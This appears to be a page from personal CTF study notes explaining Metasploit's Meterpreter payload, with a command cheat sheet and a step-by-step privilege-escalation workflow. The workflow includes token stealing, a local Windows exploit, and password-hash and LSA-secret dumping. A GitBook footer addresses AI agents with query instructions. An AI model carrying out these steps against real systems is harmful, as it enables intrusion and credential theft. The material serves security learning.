> For the complete documentation index, see [llms.txt](https://capcap-1.gitbook.io/capcap/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://capcap-1.gitbook.io/capcap/readme/ctf-modules/vulnerability-assessment/msf/meterpreter.md).

# Meterpreter

**What is it?**

Meterpreter is MSF's most powerful payload — dubbed the "swiss army knife" of pentesting. Key properties:

* **Stealthy** — lives entirely in memory, nothing written to disk, no new processes created, all comms AES encrypted
* **Powerful** — channelized communication, spawns OS shells as dedicated channels
* **Extensible** — load new modules at runtime without rebuilding

***

**How it Works (on exploit)**

1. Target runs the initial stager (reverse/bind)
2. Stager loads the Reflective DLL
3. Meterpreter core initializes → establishes AES-encrypted connection → sends GET to MSF
4. Extensions load (always `stdapi`, loads `priv` if admin rights obtained)

***

**Essential Commands**

**System info:**

```bash
sysinfo        # OS, hostname, arch
getuid         # current user
getpid         # current process ID
ps             # list all running processes
```

**Privilege:**

```bash
steal_token <PID>   # steal token from another process (impersonate)
hashdump            # dump password hashes (needs SYSTEM)
lsa_dump_sam        # dump SAM database
lsa_dump_secrets    # dump LSA secrets
```

**Navigation:**

```bash
pwd / getwd    # current directory
ls / dir       # list files
cd             # change directory
cat            # read file
download       # download file to attacker
upload         # upload file to target
search         # search for files
```

**Networking:**

```bash
ifconfig / ipconfig   # network interfaces
netstat               # active connections
arp                   # ARP cache
portfwd               # port forwarding
route                 # view/modify routing table
```

**Shell:**

```bash
shell          # drop into system shell (cmd/bash)
background     # send session to background
sessions -i 1  # jump back to session
migrate <PID>  # migrate to another process
```

***

**Key Workflow — Priv Esc Pattern**

This is the standard flow you'll use constantly:

```bash
# 1. Land meterpreter shell, check user
meterpreter > getuid         # e.g. NT AUTHORITY\NETWORK SERVICE

# 2. If access denied on getuid, steal a token
meterpreter > ps             # find a process running as higher priv user
meterpreter > steal_token 1836

# 3. Background and run local exploit suggester
meterpreter > bg
msf6 > use post/multi/recon/local_exploit_suggester
msf6 > set SESSION 1
msf6 > run

# 4. Pick a suggested exploit, set SESSION, run
msf6 > use exploit/windows/local/ms15_051_client_copy_image
msf6 > set SESSION 1
msf6 > set LHOST tun0
msf6 > run

# 5. Now SYSTEM — dump hashes
meterpreter > hashdump
meterpreter > lsa_dump_sam
```

***

**Important Notes**

* **`migrate`** — moves Meterpreter into another process. Useful for stability or privilege. If you're in a web process (w3wp.exe), migrate to something more stable.
* **`steal_token`** — doesn't fully elevate you, just impersonates. Use local exploit suggester for real privesc.
* **`hashdump`** requires SYSTEM — won't work as a low-priv user.
* **Leaving traces** — the IIS example shows a `.asp` file left behind when deletion fails. Real engagements require cleanup; MSF tries but doesn't always succeed.
* **`local_exploit_suggester`** is a post module — always needs `SESSION` set, not RHOSTS.

<figure><img src="/files/XXw8XAe55aPEyigh7a9S" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://capcap-1.gitbook.io/capcap/readme/ctf-modules/vulnerability-assessment/msf/meterpreter.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
